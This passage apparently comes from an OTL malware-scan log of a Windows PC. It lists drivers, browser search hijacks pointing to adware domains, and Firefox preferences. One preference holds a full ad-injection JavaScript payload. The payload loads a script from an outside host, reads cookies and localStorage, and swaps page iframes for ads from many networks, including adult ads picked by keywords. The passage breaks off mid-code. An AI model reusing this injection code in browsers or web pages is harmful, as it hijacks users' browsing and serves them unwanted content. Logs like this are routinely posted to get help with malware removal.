DRV:64bit: - (VMnetAdapter) -- C:\Windows\SysNative\drivers\vmnetadapter.sys (VMware, Inc.)
DRV:64bit: - (Sftvol) -- C:\Windows\SysNative\drivers\Sftvollh.sys (Microsoft Corporation)
DRV:64bit: - (Sftplay) -- C:\Windows\SysNative\drivers\Sftplaylh.sys (Microsoft Corporation)
DRV:64bit: - (Sftredir) -- C:\Windows\SysNative\drivers\Sftredirlh.sys (Microsoft Corporation)
DRV:64bit: - (Sftfs) -- C:\Windows\SysNative\drivers\Sftfslh.sys (Microsoft Corporation)
DRV:64bit: - (hcmon) -- C:\Windows\SysNative\drivers\hcmon.sys (VMware, Inc.)
DRV:64bit: - (vmci) -- C:\Windows\SysNative\drivers\vmci.sys (VMware, Inc.)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (npf) -- C:\Windows\SysNative\drivers\npf.sys (CACE Technologies, Inc.)
DRV:64bit: - (RTHDMIAzAudService) -- C:\Windows\SysNative\drivers\RtHDMIVX.sys (Realtek Semiconductor Corp.)
DRV:64bit: - (nusb3xhc) -- C:\Windows\SysNative\drivers\nusb3xhc.sys (NEC Electronics Corporation)
DRV:64bit: - (nusb3hub) -- C:\Windows\SysNative\drivers\nusb3hub.sys (NEC Electronics Corporation)
DRV:64bit: - (xusb21) -- C:\Windows\SysNative\drivers\xusb21.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (RTL8023x64) -- C:\Windows\SysNative\drivers\Rtnic64.sys (Realtek Semiconductor Corporation                           )
DRV:64bit: - (NVENETFD) -- C:\Windows\SysNative\drivers\nvm62x64.sys (NVIDIA Corporation)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (AX88772) -- C:\Windows\SysNative\drivers\ax88772.sys (ASIX Electronics Corp.)
DRV - (gdrv) -- C:\Windows\gdrv.sys (Windows ® Server 2003 DDK provider)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (NPPTNT2) -- C:\Windows\SysWOW64\npptNT2.sys (INCA Internet Co., Ltd.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE:64bit: - HKLM\..\SearchScopes\{050F6D2A-CD2C-4CCF-A95E-9A59CEE646C0}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-re...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {AC533334-23E6-4E5F-B1DA-9240ED676A3E}
IE - HKLM\..\SearchScopes\{52A54A6E-3E27-4A22-A928-6755ADA9CFFC}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-re...q={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\..\URLSearchHook: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
IE - HKCU\..\SearchScopes,DefaultScope = {AC533334-23E6-4E5F-B1DA-9240ED676A3E}
IE - HKCU\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://search.babylo...00074ea3aaa5ed7
IE - HKCU\..\SearchScopes\{16C1B23E-3CE1-4f7f-A708-A8F88D636FD7}: "URL" = http://search.yahoo....cevm&type=STDVM
IE - HKCU\..\SearchScopes\{182BD4F4-21ED-4e6c-B65D-F3B9DB6B36AE}: "URL" = http://www.google.co...2788:4067623346
IE - HKCU\..\SearchScopes\{27BF7A62-CF9F-4A1A-9BB5-61A8DABE910E}: "URL" = http://searchou.com/...0b60df2d6&r=182
IE - HKCU\..\SearchScopes\{39567D58-C4D9-4285-9C5C-208E15077106}: "URL" = http://www.bing.com/...=SPLBR2&pc=SPLH
IE - HKCU\..\SearchScopes\{63140ECF-C629-BE59-8F0E-90B4FF340C03}: "URL" = http://lf.startnow.c...eferrer:source}
IE - HKCU\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-re...q={searchTerms}
IE - HKCU\..\SearchScopes\{AC533334-23E6-4E5F-B1DA-9240ED676A3E}: "URL" = http://search.condui...9032553456&UM=2
IE - HKCU\..\SearchScopes\{CFF4DB9B-135F-47c0-9269-B4C6572FD61A}: "URL" = http://mystart.incre...6OyQNcT6kP&i=26
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..CT3295465.browser.search.defaultthis.engineName: "true"
FF - prefs.js..browser.search.defaultenginename: "Yahoo"
FF - prefs.js..browser.search.defaultenginename,S: S", ""
FF - prefs.js..browser.search.defaultthis.engineName: "BrowserPlus1 Customized Web Search"
FF - prefs.js..browser.search.defaulturl: "http://search.condui...={searchTerms}"
FF - prefs.js..browser.search.order.1: "Search The Web (privitize)"
FF - prefs.js..browser.search.order.1,S: S", ""
FF - prefs.js..browser.search.param.yahoo-fr: "moz2-ytff-sunm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "moz2-ytff-sunm"
FF - prefs.js..browser.search.selectedEngine,S: S", ""
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.enabledAddons: %7B73a6fe31-595d-460b-a920-fcc0f8843232%7D:2.6.8.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:26.0
FF - prefs.js..extensions.enabledItems: {73a6fe31-595d-460b-a920-fcc0f8843232}:2.1.0.3
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}:6.0.23
FF - prefs.js..extensions.jCIi_.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1var d=this.fetch();if(d)return a(parseInt(d));if(1== B){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch( B){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['mediashakers_rmx',405],['cpx_bet_55',127],['deliads_apx_tb_new',72],['saymedia_apx_tag_test',71],['start_me_app_tier1',145],['webmedia_tb_new',91],['baba_tb_new',288],['dsnr_toptier1_gentb',1701],['xertive_gentb',3110],['mediashakers_apx3',33],['cpx_int47_tr',451],['cpx_int41_tr',474],['clove_fixed_us_uk',723],['mindads_rmx_new',215],['cpx_favorhythmic',193],['adfish_hasoffers',91],['mediawhite_nontb',141],['matomy_adj8',644],['matomy_adj8_2',645],['mmg_new222',92],['adstract_adwp_new2',137],['mari_nontb',151]],[['cpx_nontb30_tr',416],['dsnr_strm_t1',432],['mari_strm4',1711],['matomy_strm5_2',3720],['matomy_strm5',3721]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function( B){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('KiBLRSQw=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ad.media-servers.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"adfishmedia.go2cloud.org\"||window.self.location.hostname==\"srv1.mediads.info\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting ###### gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock ###### threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function( B){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function( B){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s0\"))continue}catch©{try{if(d[i].getAttribute(\"s0\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287609')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s0\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a, B){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a, B)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&& B){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d]( B);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'KiBLRSQw=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s0\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{mediashakers_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.media-servers.net/st?ad_type=iframe&ad_size=+size+&section=5021599&section_code=713_0&pub_url=' (atp?atp:1), [313,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=+reff+' (atp?atp:1), [354,size]);}}catch(e){return !1;}},deliads_apx_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1962958\",\"300x250\":\"1962952\",\"120x600\":\"1962975\",\"160x600\":\"1962977\",\"468x60\":\"1962981\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&cb=&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [359,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},start_me_app_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030220&size=+size+&cb=&age=&gender=&referrer=&pubclick=' (atp?atp:1), [411,size]);}}catch(e){return !1;}},webmedia_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2049295&size=+size+&referrer=' (atp?atp:1), [418,size]);}}catch(e){return !1;}},baba_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1957852\",\"300x250\":\"1947796\",\"468x60\":\"1957860\",\"120x600\":\"1957857\",\"160x600\":\"1957854\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [423,size]);}}catch(e){return !1;}},dsnr_toptier1_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2059560&size=+size+&referrer=' (atp?atp:1), [428,size]);}}catch(e){return !1;}},xertive_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&site=1736632&section_code=713_0&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_' (atp?atp:1), [434,size]);}}catch(e){return !1;}},mediashakers_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;var arr={\"728x90\":\"2107541\",\"300x250\":\"2107538\",\"468x60\":\"2107542\",\"120x600\":\"2107544\",\"160x600\":\"2107539\"}[size]; var surl=\"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=&referrer=&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [440,size]);}}catch(e){return !1;}},cpx_int47_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/53626/index.html?size=+size+&referrer=' (atp?atp:1), [441,size]);}}catch(e){return !1;}},cpx_int41_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/44758/index.html?size=+size+&referrer=' (atp?atp:1), [444,size]);}}catch(e){return !1;}},clove_fixed_us_uk:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2077387\",\"300x250\":\"2076962\",\"160x600\":\"2077388\"}[size];var surl = \"http://ads.clovenetwork.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [445,size]);}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&section=4889565&pub_url=&section_code=713_0' (atp?atp:1), [458,size]);}}catch(e){return !1;}},cpx_favorhythmic:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/47278/index.html?size=+size+&referrer=' (atp?atp:1), [460,size]);}}catch(e){return !1;}},adfish_hasoffers:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr ={\"300x250\":\"4\",\"160x600\":\"6\",\"728x90\":\"2\",}[size];var surl = \"http://adfishmedia.go2cloud.org/aff_ad?campaign_id=\"+arr+\"&aff_id=4276&format=iframe\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [461,size]);}}catch(e){return !1;}},mediawhite_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2120863\",\"300x250\":\"2120862\",\"160x600\":\"2120861\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [463,size]);}}catch(e){return !1;}},matomy_adj8:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122636\",\"300x250\":\"2122633\",\"160x600\":\"2122638\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [464,size]);}}catch(e){return !1;}},matomy_adj8_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122637\",\"300x250\":\"2122634\",\"160x600\":\"2122640\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [465,size]);}}catch(e){return !1;}},mmg_new222:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://srv1.mediads.info/tags/?tid=222&size=+size+&hash=9yps43&q=&pub_domain=' (atp?atp:1), [466,size]);}}catch(e){return !1;}},adstract_adwp_new2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2121067&size=+size+' (atp?atp:1), [469,size]);}}catch(e){return !1;}},mari_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60' )return; var arr={\"728x90\":\"2119652\",\"300x250\":\"2119654\",\"468x60\":\"2119655\",\"120x600\":\"2119656\",\"160x600\":\"2119653\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return 